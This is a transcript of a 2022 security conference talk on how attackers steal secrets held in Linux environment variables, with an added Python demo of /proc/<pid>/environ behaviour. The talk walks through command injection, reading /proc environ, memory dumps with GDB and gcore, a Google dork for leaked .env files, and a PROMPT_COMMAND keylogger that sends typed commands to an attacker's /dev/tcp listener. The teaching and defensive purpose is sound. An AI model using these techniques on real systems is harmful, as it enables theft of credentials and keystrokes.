
The hackers guide to environmental catastrophe

BSides Augusta · 2022 · 26:31 · 153 views · Published 2022-10
Category: Technical
Style: Talk
About this talk
CNN, Fox News and Greta Thunberg; they all know. If you are paying any attention, you see what's happening. Organizations and governments are relying more and more on online services. As a result, sensitive data such as authorization codes, usernames, passwords and API keys is being stored in environment variables. In this talk we will look at the security around Linux environment variables. I'll show you how attackers steal this data and use it against you. You will learn how certain environment variables are used by attackers to exploit your system. I'll explain different options for securing this data and the risk associated with each of them.
Transcript [en]

Thank you, thank you. All right, so it's a 30-minute talk, a lightning talk, so we're gonna do this lightning fast. My name is Mark Baggett. I'm an instructor for SANS. I'm the author of a couple of different SANS courses: 573, which is Automating Information Security with Python; 673, which is the advanced 573; and then I'm the co-author of a course that's going to be coming out sometime next year on an introduction to Linux security. I'm going to show you some of that. One thing that I think is kind of cool is my name appears in the source code for Metasploit seven times, even though I've never written a module for Metasploit. It's just that other people have written the plugins and things for TTPs and things that I've developed, and then given me credit for it in the source code, because the information security community is awesome in that way.

So what I wanted to talk to you about today actually came up because of this tweet. Somebody tweeted on the internet: "I'd like to thank whoever decided it was cool to shove secrets and passwords and tokens and stuff into environment variables and make attacking stuff so much easier." And the truth is that, particularly as we move to the cloud, we're getting more and more stuff put into environment variables. Here's AWS: you're setting your access keys, secret keys. This is some code from Django, a Python web framework, and just look at all of this os.environ.get. It's pulling environment variables, and it's looking for API secrets, and debug mode, and allowed hosts, and the app database, the database engine, and the database name, and the database username, and the database password. Lots and lots of information that's stored in environment variables that, if attackers can get to it, is really useful.

So I was doing some research, working on some stuff, and I saw that tweet that was out there, the one I just showed you a minute ago, and I posted a question on Twitter. I'm like, yeah, that's cool, but how are you getting these environment variables? Because in the scenario I was looking at, it was actually kind of difficult to get to some of the environment variables. And of course the obvious answer from everyone on Twitter is: you type set, or you type env. Mark, what's your problem? How do you not know how to get environment variables? So this entire presentation is actually just my response to that, trying to say, no, I'm not really just an idiot; there are these circumstances where environment variables aren't that easily accessible. Well, let's take a look at some of those, and then we can decide if I'm going to redeem myself here.

So I'm going to start out with a bit of a demo. I'm actually demoing something that comes from one of the new courses I mentioned, which is the 406 class, and so this is actually going to be one of the labs that is in 406 where we talk about... oh, that's not it... where we talk about environment variables. Did it go away again? How did it go away again? Okay, unplug, repeat. There we go. All right, environment variables. Can I go full screen? It stayed. Look at that, how about that. All right, so I should have done this ahead of time. Kind of the idea with 406, which is the introduction to Linux, is we would love to have a class where we don't need an instructor, where we can just turn you loose on hands-on labs and let you learn through experimentation and doing things. So you'll see at the bottom I'm getting these prompts asking me to do certain things. I'm kind of gonna skip forward to what it is that I wanted to show you, and as much as I can I'll make everything a CTF. So: hey, echo and display the variable name used to store the path to your home directory. So what variable am I looking for here?

$HOME. Okay, it's an introduction to Linux, okay. Let's see what's next: the variable that contains the list of directories that Linux searches through for commands you are trying to run. echo $PATH. All right, and then I think next is what I really wanted to get to. Okay, so let's go ahead and create some variables here. I'm going to go ahead and create the variable myvar, m-y-v-a-r, equals 10, and this creates that environment variable. And now to retrieve that environment variable I can echo $myvar and it will show me the contents of the variable that I just created. So now it's going to tell me, hey, there's a couple of different ways you can view environment variables that you've already got created. I can type env; that is one of those ways, and this displays, well, the environment variables that are exported. It tells me it's hard to find, let's grep for it. So let's type that and pipe it to grep myvar. Right there I can see that myvar does not appear in env. So just creating an environment variable, it doesn't appear in env. Now where it does appear, which is what it's going to have us look at next, is if we type set. So we change that to set, and I can see, all right, myvar is shown there. So the difference between the two is whether or not the variable is exported. So when you export a variable, an environment variable, that allows subprocesses to see those environment variables, and right now I don't have this thing set. So what is it going to tell me to do? Oh, so this is going to tell me to open up a new shell, so bash, and then when I get in there, try and echo myvar, and you'll see that in this subprocess, the subprocess doesn't have access to that environment variable. And I can check env with that grep command again, and again it's not there. But if I go back to my parent shell and then I export myvar, then magically now everything should be able to see that. So now if I look at env, I can see that the variable does show up in env, and if I go into another subprocess such as bash, I can now echo $myvar, okay, and it appears there. Okay, so you have to export the variables for child processes to see those types of variables. Okay, so local variable, unexported, versus exported. Okay, and I just demoed these three slides. So when a variable is not exported, it can only be seen by, well, if you open up a bash prompt and you set an environment variable, you can see it in that bash prompt, right? None of the child processes can see it. But when it's exported, all the child processes can see it, and the process can itself.

So how does this affect different exploitation scenarios? Let's look at the first scenario, which is the one that everybody on Twitter was talking about, which is where I've created all these environment variables and then my web server is accessing them, and then, well, they're in memory inside of my web server. So to demo this, I'm going to come over here. I'm going to use a web server. I've got a tool that I've written called APIfy, which... oh, actually let me first do this. Let me create an environment variable. So I'm going to create a variable called "cloud API secrets" and I'm going to export it, and then I'm going to start my web server called APIfy. Now this has got a code injection vulnerability in it, but it's actually a configuration option. You can say, do you want to be vulnerable to code injection or not? And I've chosen to say yes, I do want to be vulnerable to code injection. So with this one, what it's going to do is actually run ping; it's going to run this command right here plus whatever command line argument I pass to it. And the idea of APIfy is I just want to JSONify the entire world, so if you have any Linux command that you would like to be able to integrate into some type of an event management platform, you can just run this and it'll cache the entries, and it does about 60,000 requests a second is what we saw, something like that, it's pretty fast. Okay, but because I've enabled command line injection, I can do things like this: I can ask it to ping google.com and then, well, also semicolon, student, or whoami. So I've got a code injection vulnerability, and with that I can put whatever command I want after this semicolon. So I can do things like, hey, let's echo dollar sign... what was the variable that I created over here? Called "cloud API secrets". So let's echo... oh, this is going to need to be a space here, so I'll put a %20 here, and then cloud API secrets, and... no secret? Did I... yeah, there you go. And so there I've got my top secret data that I could see there. Now there's actually another variable in here that I want to come back to and just show you in a minute. Let me just show you that I can also get to this other variable that's here called "more secret". Okay, so this... and, oh darn it, spoiler alert, I created this one by setting it after the process actually launches. Okay, and actually you can run anything, right? I could just run set here if I wanted to and get back a list of, well, all the environment variables through this command injection. Okay, so yes, if you have environment variables with sensitive data inside those, and those things are loaded in memory in a web process, the web process has access to those environment variables, then if you've got a command injection vulnerability, they can pull all those things. If you've got Amazon keys, whatever, database names, passwords, if there's a command injection vulnerability, bad things are going to happen. So what's the trick? Don't have command injection vulnerabilities, right? That's bad. But what about the scenario that I was actually talking about when I asked the foolish question of, well, how do you get these things out of the process memory? And that is, let's say that the attacker gets onto the web server. I've got my web server and all this stuff's loaded in memory, but I get in via either an exploit that's on the system or by guessing an SSH username or an FTP username, and get on the system where I've got a shell running on the same system as the web server. How do I get to the stuff that's in memory in that server? And it turns out

that, well, it kind of depends. So one thing, some things that you can do to make it a little bit more difficult for attackers in that scenario, where they're on the same system and I'm just trying to grab something that's stored in a service configuration or something, is, well, you can make it so that the variables are only inside of the child process and not inside the parent process that launched it. So for example, if you are at the command line and you want to just set an environment variable inside of a child process but not have it be available in your own process, you can set the environment variable, then a space, and then the other command you're going to run. And here I'm setting a variable called myvar2 equals blah, and then I run a bash prompt that's trying to echo myvar2, and you can see that, oh, it does have access to it in that bash prompt, but back here in the parent process, the thing that launched that child process, the variable is not there. So it was only available in the child process, not in the parent process. So that's one thing I could do. Of course, if this is what I did in order to set that environment variable, what's a great way to grab this thing? The history command, right? I can just go into the history, so anything you type there is obviously going to show up in the history. Well, one thing you can do to make it so that your sensitive environment variables, the ones that you don't want everybody to have, aren't recorded in any history: by default on most systems bash is configured so that if you just put a space before a command, it's not going to be recorded in history. So, space, export API key, and now, well, it doesn't show up in my history. Of course, whether or not that works depends upon an environment variable, right? So you've got this environment variable called HISTCONTROL that says, hey, here's my options. ignorespace is one of the options; ignoreboth is, I'm going to ignore both space and duplicates. So if it's this or this, then I can just use the space to not record my environment variables.

All right, so let's say that we do all of those things. I'm on the same system as the web server. What's a great way to grab the information that's on there? Well, the first place I went to is the /proc folder, right, that we have on our Linux system, because when a process launches, the operating system does it. So let's try that. So over here I've got my web server. Let's figure out what my process ID number is. All right, so my APIfy is running here under process number 7681, so let's cd into /proc, p-r-o-c, /7681, and in there I'll have a folder called environ. Okay, and then I'm going to cat environ, e-n-v-i-r-o-n, and I'm gonna just grep for API, or let's just grep for secret. Okay, grep -a secret. All right, and so there you can see my cloud API secret shows up there. But one thing didn't show up there, and that was, what was the other variable that I asked for here? It was "more secret". "More secret" was available here when I used it through a command injection; I was actually able to see the value that was in "more secret". So here I can see that value there, but over here in /proc environ it's not there. Does anybody know why it's not there? Because the kernel sets that at launch, right? The environment variables inside of /proc are recorded when the process launches, which means that if in my scripts I set all my environment variables and then I launch my web server, those will show up in /proc. But if the process was to set its own environment variables, or to do other things to have its information stored, that's not going to be set in /proc. So that's, well, maybe I could have my process create environment variables to have its configuration. So that gets into, well, maybe then I have to feed it the configuration. Well, actually the point here is that configuration files, I think, are more secure from this standpoint than environment variables, but now your configuration files are also in clear text on the machine, so now I'm just looking for configuration files to get that. So I'll get into some of that, but there you go. So my question was, okay, I'm in a situation where I actually want to get the keys that are in memory in this process that were set after the process launched.

How can I do that? And it turned out to be, well, a fun afternoon of coding, because it turns out that, well, it's not as easy as you want. I did write a process, and this is on my... it's actually on a gist, gist.github.com. I wrote this little process called, well, dump environment variables, that given a process ID, what was my process ID number, 7681, right, so I can sudo process 7681, and what it's going to do is actually use GDB to hook the process, then go through the data structures that are in GDB, pull out all the environment variables, and so yeah, I can still get to them. But, well, I have to be able to dump memory on the system. So I'm like, all right, awesome, I wrote this little program. I went to the system, I'm like, let's dump the memory, and it doesn't work. Like, wait a minute, why can't I dump the memory? It works on my system, right? That's what we say as developers when we write code. But okay, it turns out I was actually the customer in this case who was trying to use the code on another system, so I had to figure it out. I couldn't just say it works on my system. So why did it work on my system and not on the other system? Well, turns out that there's some Linux kernel configurations that can prevent this. And I don't know where I am in my slides now. All right, so demo and /proc, just did that, stealing variables, yep, I did have time for that.

So who can steal stuff from memory? Well, it actually depends. Root can steal anybody's stuff from memory. So if the attacker has root on your system, as we all can imagine, game over, right? They can get those, but you know, they've got everything that they need at that point. But what about where I was, right? If I pop the account for the Apache process, the service account, and I'm on there as another Apache process, can I dump the memory from another Apache process? And the answer is, well, no, you can't in most circumstances. Actually there's a setting in this config, the ptrace config, which prevents you from dumping memory in other sibling processes. So if I was in an Apache web service account that was like the child process of the web server, then I could get to those things. But if I'm just on the system as another Apache process, then I actually can't dump the memory from those processes. And it is a memory dump, so this doesn't just apply to environment variables; this would apply to configuration or just any sensitive data that's kept in there. If you're a sibling process, then you cannot do this. So, awesome, I'm just going to go in there and I'm going to change the setting inside of ptrace, and, oh, who can change that? Root, right, root. And it's going to require a reboot of the system afterwards. So this is actually what kept me from getting those environment variables, so there's that.

Okay, so the answer is just stick everything into config files, right? Yeah, except people put config files on their system and then they forget about them and they post them to GitHub, right? So here, go to Google: db user filetype:env. These .env extensions are where people will set environment variables in all kinds of frameworks, and then it loads those things up into memory. So yeah, these don't look like templates; these look like legit usernames and passwords that are coming back to me. Okay, so there's that.

The other thing I wanted to mention about environment variables is that environment variables are also really useful to an attacker from an offensive standpoint. I don't know if you've been looking at some of the interesting backdoors that have been developed over the last year or two, but there's this thing called the Symbiote backdoor in Linux, and it's actually using this environment variable called LD_PRELOAD. By default, Linux processes can either load system libraries on their own or, if they're configured to, they can just use the libraries from their parents, and actually the default is to, look, if my parent process already has this library loaded, then I'm not going to load it up myself; I'm just going to use the one that my parent process did. But you can change that and you can say, hey, even if your parent process has it, then I want you to load it, and by the way, here's a path for that file. So it's basically like DLL side-loading on Windows, but it's roughly the Linux equivalent of that. So there's some privilege escalation exploits, and here I've got some links; you can go back and watch the slides and pull out these links, but there's some cool privilege escalation exploits that you can use with LD_PRELOAD, and there's some backdoors that have some interesting... And here's another fun one. This one is kind of fun; I thought I'd just show this to you. How about an environment variable that creates a keylogger? So let me see, I think I have on my desktop the ability to demonstrate this to you. Let's see, ls... yeah, well, it's cat env keylogger here. And then, over here on this window, I'm gonna put a little while loop; it's going to be a netcat listener. Okay, so let's just do that here. So this is going to be my attacker here on the internet. This is my attacker, paste. All right, so he's got his little netcat listener running over here, and then I'm here on my victim. I'm just going to set the PROMPT_COMMAND environment variable. So what does PROMPT_COMMAND do? Well, PROMPT_COMMAND is going to run every time a prompt appears. And what am I telling my PROMPT_COMMAND to do here? I'm gonna say, all right, anytime you make the prompt appear, I want you to run the command history -a, which says take any command history that you've got in memory and commit it to the file that's on the system. Then I'm gonna say, all right, now take the last line out of that file, the bash history on that system, and then just write it to /dev/tcp/<the IP address of the attacker>/9000, where I've got my little netcat listener running. So here, by just creating this environment variable, now if I type ls, id, whoami... whoops... whoami, right, back over here in attacker land, right, it's a keylogger. We're not getting the output, but it's a keylogger, not an output logger. So with just an environment variable, we can do things like creating a keylogger in environment variables.

And since we also talked about dumping memory, I thought this would be a good opportunity to just throw out this other thing I tweeted about, which was, you know, is anybody not using GitHub these days? It's another thing that, you know, cloud use has exploded, everybody's using GitHub for configuration. Anybody using git credentials? You know what, I'm tired of typing that password all the time. Yeah. So if an attacker can dump your memory, and a good process to dump memory, if you're root of course, is gcore, where you can just say, hey, record in this file all of the memory from this process ID, and then you just run strings on it. So here I'm just going through that memory dump and looking for "user" slash "password", and here you can see my username and password there. So this is another thing relating back to what we talked about: who can dump that memory? Well, root, so don't let people get root on your system, and parent processes of the same user ID, and that's who can dump that memory.

And that is what I've got for you, and we've got five minutes left, so I can take questions. My points here are these: there's a lot of sensitive data in your environment variables. Don't put stuff there that you really care about, and do what you can to lock your systems down. There are some things you can do, like make sure it's not in your history and things like that. If possible, have all of that sensitive data load into memory afterwards; then it won't be recorded in /proc, and then it's just a matter of protecting memory through good privilege... through good rights management. Okay, any questions? Because I'm standing between you and lunch. What you got?

Could I use ptrace to defend against that, and ptrace myself?

I don't know, I don't know. I'd have to experiment with that, so I'm not quite sure, but that's a great question. Would you like the Red Team Field Manual or would you like a war collar? War collar, okay. Here's a broken... work... I'll learn... let's see, Charlie catches it. Okay. Question: I don't have the slides for download, but they'll be out on YouTube; there'll be a YouTube video on it. Yep. Other questions? What you got?

Would SELinux protect against a sibling process, even a sibling process doing it?

There are so many management and configuration changes that are in SELinux; I imagine that there's probably something that you could use to protect against that with SELinux, but I can't give you the definitive answer on that. But with that, maybe the answer to your question is in the Red Team Field Manual. And so there you go. All right, so for lunch you should have blue tickets, right?
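The /proc/<pid>/environ behaviour the talk demonstrates (a variable present at launch shows up there, a variable the process sets for itself afterwards does not) can be reproduced without the talk's web server. The following is an added example, not code from the talk or its tooling: it launches a constructed stand-in child process with CLOUD_API_SECRET in its environment, has the child set MORE_SECRET after start-up, and compares what the child itself sees with what a same-user neighbour reads from /proc/<pid>/environ. The variable names are constructed placeholders and the script assumes a Linux host with /proc mounted.

```python
import json
import os
import subprocess
import sys


def parse_proc_environ(pid):
    """Parse /proc/<pid>/environ (Linux only): NUL-separated KEY=VALUE records
    that the kernel captured from the initial stack at execve() time."""
    with open(f"/proc/{pid}/environ", "rb") as fh:
        raw = fh.read()
    env = {}
    for record in raw.split(b"\0"):
        if not record:
            continue
        key, _, value = record.partition(b"=")
        env[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env


# Constructed stand-in for the talk's web server: it starts with one secret
# already in its environment, sets a second one itself after start-up (like
# "more secret" in the talk), reports what it sees, then waits on stdin so the
# parent can inspect it while it is still alive.
CHILD_SCRIPT = r"""
import json, os, sys
os.environ["MORE_SECRET"] = "set-after-launch"   # putenv() after launch
print(json.dumps(sorted(os.environ)), flush=True)
sys.stdin.readline()
"""


def compare_views():
    """Launch the child with CLOUD_API_SECRET in its environment and return
    (visible_to_process, visible_in_proc): per-secret booleans for what the
    process itself sees versus what /proc/<pid>/environ shows a neighbour."""
    launch_env = dict(os.environ, CLOUD_API_SECRET="set-before-launch")
    child = subprocess.Popen(
        [sys.executable, "-c", CHILD_SCRIPT],
        env=launch_env,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        text=True,
    )
    try:
        visible_to_process = set(json.loads(child.stdout.readline()))
        visible_in_proc = set(parse_proc_environ(child.pid))
    finally:
        try:
            child.stdin.write("\n")   # release the child
            child.stdin.close()
        except BrokenPipeError:
            pass
        child.wait(timeout=10)
    names = ("CLOUD_API_SECRET", "MORE_SECRET")
    return (
        {n: n in visible_to_process for n in names},
        {n: n in visible_in_proc for n in names},
    )


if __name__ == "__main__":
    seen_by_process, seen_in_proc = compare_views()
    print("seen by the process itself:  ", seen_by_process)
    print("seen in /proc/<pid>/environ: ", seen_in_proc)
```

The same property cuts both ways for a defender: a secret injected at launch is readable by anyone who can open the target's /proc/<pid>/environ, while a secret the process loads into its own memory later is only reachable by dumping that memory.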